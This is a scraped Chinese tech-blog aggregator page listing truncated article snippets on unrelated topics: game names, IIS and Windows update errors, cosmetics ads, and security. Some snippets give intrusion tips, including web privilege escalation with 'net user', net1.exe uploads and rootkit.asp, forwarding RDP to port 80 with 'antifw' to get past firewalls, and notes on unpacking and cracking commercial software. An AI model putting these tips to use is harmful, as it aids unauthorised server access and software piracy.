    名字真好听的五子棋——12周进度 伪代码 创建五子棋游戏主窗体和菜单 实现了整个五子棋程序算法的核心 棋盘的宽度、高度、棋盘 棋盘方格的横向、纵向坐标所对应的棋子颜色 判断下子的横向、纵向坐标是否越界 判断该坐标位置是否可下棋子 在该坐标位置下棋子判断胜负 流程图UML…...

    2024/4/20 17:08:01
  2. web提权总结

    【 web提权 】 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是sys…...

    2024/4/22 10:08:58
  3. VS2010 在Win 7 附加w3wp.exe进程进行调试和权限问题

    因为在Windows 7 中有了UAC这么一个东东,所以很多东西都需要系统管理员的权限了,所以在附加w3wp.exe进程时,就会提示如下信息框--关于权限问题。 1。在启动VS2010时,按住Ctrl+Shift后,单击打开VS 2010 2。右击VS2010(devenv.exe)后,在菜单中选择"以管理员身份运行…...

    2024/4/20 17:08:00
  4. 嘉年华--好好听的名字噢!

    题目听起来怎么有点矫柔造作的语气迪士尼的嘉年华来了,我突然有了一种非要去看看的冲动,真是于是就撺掇pp,pp问起丽子,就是的,怎么忘了她,跄跄三人行就是这么组成的.pp说应该是两人去的地方,怎么偏要拽上她们,改成三人去.我说:“如果我的生活里只两个人存在,会缺少很多色彩“(这…...

    2024/4/20 17:07:59
  5. Web入侵法总汇

    本博客专门收集通过网站应用程序这一层次(web application layer)入侵的黑客手法。通过Web入侵可以避开防火墙,因为所有的操作都是通过HTTP,在端口80进行的。据统计这种入侵方法占internet入侵总数的75%。本博客致力于帮助广大程序员及网站管理员对这种方法作深入的了解,以便…...

    2024/4/20 17:07:57
  6. 好听的女孩游戏名字:梦紫★幽兰 梦蝶※雪儿

    梦紫★幽兰 梦蝶※雪儿 云淡↘风轻 知足↘常乐 绯眸★凝月 水中↘天使 江南↘听雨 琪琪↘宝贝 逆风★飞扬 可爱★女生 如沐↘春风 蓝天↘白云 琪乐↘融融 静等↘花开 蓝天↘的云 游戏名字|游戏名字大全 我心★飞翔 人海★情缘 伊人↘如梦 陌上↘花开 月明★星稀 人生★如梦 爱心…...

    2024/4/27 13:50:13
  7. kali_64安装w3af失败

    遇到的报错信息如下: root@kali:~# apt-get install w3af Reading package lists… Done Building dependency tree Reading state information… Done Package w3af is not available, but is referred to by another package. This may mean that the package is miss…...

    2024/4/21 11:22:59
  8. 在TMG2010中发布Web服务器场

    在许多情况下,我们使用TMG2010(或ISA Server 2006)发布单一的Web服务器,这适合对可靠性与性能要求不高的单位。如果用户对网站的响应要求比较高,并且要求实时在线并且需要提供容灾能力时,发布单一的Web服务器就不适合了。例如,在图1所示的网络拓扑中,Web服务器由两台服…...

    2024/4/21 11:22:59
  9. 好听的女孩游戏名字:杨柳★依依 蓝之※枫林

    杨柳★依依 蓝之※枫林 云淡★风轻 心静↘如水 今夜↘薇凉 梦想↘成真 浅浅↘一笑 雨中↘漫步 风淡★云清 蓝色★紫玲 落花★忆梦 丝丝↘小雨 好听的女孩游戏名字|游戏名字大全 一地↘琉璃 茜茜★燕子 甜甜★向上 浅夏↘淡忆 星辰↘启航 可爱★天使 秋水★伊人 青云★流水 轻风…...

    2024/4/21 11:22:57
  10. 转发3389到80突破防火墙

    干掉IPSEC后仍然无法连接3389,就可以用到此工具,自动停止IIS将3389转到80上 工具的命令是在cmd下输入 antifw -s 运行程序 停止iis将3389改为80 antifw -l 关闭程序。恢复iis web服务器肯定不限制80端口的连接,所以开了防火墙也不会限制80…所以用这个你再开防火墙也没有…...

    2024/5/4 20:19:45
  11. 在计算机“.”上没有找到服务W3SVC。(http)/在计算机上没有找到服务WAS

    在配置完Windows下的IIS服务之后,新建了一个网站,却不能启动。错误提示是:在计算机“.”上没有找到服务W3SVC。(http)和在计算机上没有找到服务WAS。解决办法:打开电脑控制面板->程序->程序和功能->启用或关闭windows功能原因是: 没有开启相关服务可以发现,网站…...

    2024/4/26 22:52:29
  12. 路路通 GPS软件 脱壳+破解 纪要 (RtNavi.exe)

    用PEID查壳为未知壳,如图。用ESP定律尝试,可直接到OEP,用loadpe先完整转存,再用ImportREC修复IAT,在修复过程中发现最后一行invalid,直接先删除掉。 打开修复后的文件,弹出错误对话框,如图:1,初步考虑为刚刚删除掉的无效IAT有问题,初步跟踪,没有发现特别之处。 2,…...

    2024/5/4 22:19:20
  13. w3m的的使用

    w3m是linux下的文本网页浏览器。我用的ubuntu的操作系统,用apt-get装完之后。就可使用了。 w3m是一个支持html格式的济览器,暂不支持ccs,所以排版有点混乱,但它对中文支持相当好。 比如 $w3m http://www.sohu.com 光标上下左右移动的的快捷键和VI一样。 可以用manpages看更…...

    2024/4/21 11:22:53
  14. Windows Server 2012 Web方式修改域用户密码-通过Remote Desktop Web实现

    1.在Windows Server 2003上,操作系统默认提供了一种修改域用户密码的方式 2.在Windows Server 2008上,可以提取Windows Server 2003上的代码来实现相同的功能 3.在Windows Server 2012上,提供了一种新的修改域用户密码的方式:通过Remote Desktop Web修改域用户密码,下面我…...

    2024/4/27 12:45:14
  15. W3C 解析XML

    W3C解析 负责 XMLpackage com.itheima.xml;import java.io.FileOutputStream; import java.io.OutputStreamWriter; import java.io.Writer; import java.util.Iterator; import java.util.Vector;import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.Docum…...

    2024/4/27 13:17:00
  16. 关于web服务器的攻击方式汇总

    web服务器是很容易受到攻击的,而且攻击方式呈现多样化,很多人都不知道web服务器的攻击方式到底是哪些,所以都不知道如何下手预防web服务器被攻击,因此今天本教程就整理了一些攻击方式,让大家了解一下。1、SQL注入漏洞的入侵这种是ASP+ACCESS的网站入侵方式,通过注入点列出…...

    2024/4/21 11:22:50
  17. ESP法和二次断点法脱壳总结

    ESP法和二次断点法脱壳总结 一直想学一些逆向破解之类的知识,但是起步比较难,听看雪的某个高手说你可以从免杀方面的知识入手,掌握点基础。 首先感谢姬良写的《杀不死的秘密》这本书,真心不错。 1、ESP 原理:维持堆栈平衡 壳程序运行后,首先运行壳部分,然后将原程序还原…...

    2024/4/21 11:22:49
  18. 从认识web应用开始(二)web应用基础-HTTP应用

    第一篇认识TCP通信延迟,试图总结了一下复杂的网络通信一些原理、算法基本思路。目的就是为了说明一下绝大部分web应用所依赖的底层TCP通信协议机制带来“延迟”的问题和一些常见的优化的手段。以前在电信业务系统里面有一段较长从事实时计费OCS的经历,其中一个比较重要的核心…...

    2024/4/20 17:08:13
  19. Armadillo CopyMem-ll+Debug-Blocker脱壳过程

    Armadillo CopyMem-ll+Debug-Blocker脱壳过程 作者: 飞舞的T恤 菜鸟手动脱Armadillo CopyMem-ll +Debug-Blocker壳全过程,超详细。。。 【使用工具】 Ollydbg,Loadpe,Imprec1.6F 【脱壳平台】 Win2K 【软件名称】 按键精灵3 V3.11 【加壳方式】 Armadillo 3.00a - 3.60 -> …...

    2024/4/20 5:04:26
  20. web渗透测试常规套路

    注:文章首发自合天智汇微信公众平台0x01:本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中的工具如菜刀等更是经典之作,即使发布已经10余年认识现在渗透测试网站的不…...

    2024/4/20 8:12:42

最新文章

  1. FineReport高频面试题及参考答案

    FineReport是一款利用什么语言开发的报表工具&#xff1f; FineReport是一款基于Java语言开发的报表工具。Java是一种广泛使用的编程语言&#xff0c;特别适合于跨平台的软件开发。FineReport利用Java语言的诸多优势&#xff0c;如稳定性、安全性、可移植性和强大的网络功能&a…...

    2024/5/4 23:12:26
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. 2024年04月IDE流行度最新排名

    点击查看最新IDE流行度最新排名&#xff08;每月更新&#xff09; 2024年04月IDE流行度最新排名 顶级IDE排名是通过分析在谷歌上搜索IDE下载页面的频率而创建的 一个IDE被搜索的次数越多&#xff0c;这个IDE就被认为越受欢迎。原始数据来自谷歌Trends 如果您相信集体智慧&am…...

    2024/5/4 10:38:10
  4. mysql故障及解决分析

    目录 MySQL 单实例故障排查 MySQL 单实例故障排查 &#xff08;1&#xff09;故障现象 1 ERROR 2002 (HY000): Cant connect to local MySQL server through socket /data/mysql/mysql.sock (2) 问题分析&#xff1a;以上这种情况一般都是数据…...

    2024/5/4 10:54:12
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/1 17:30:59
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/2 16:16:39
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/4/29 2:29:43
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/3 23:10:03
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/4/27 17:58:04
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/4/27 14:22:49
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/4/28 1:28:33
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/4/30 9:43:09
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/4/27 17:59:30
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/4 18:20:48
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/4/28 1:34:08
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/4/26 19:03:37
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/4/29 20:46:55
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/4/30 22:21:04
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/1 4:32:01
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/4 2:59:34
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/4/28 5:48:52
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/4/30 9:42:22
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/2 9:07:46
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/4/30 9:42:49
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57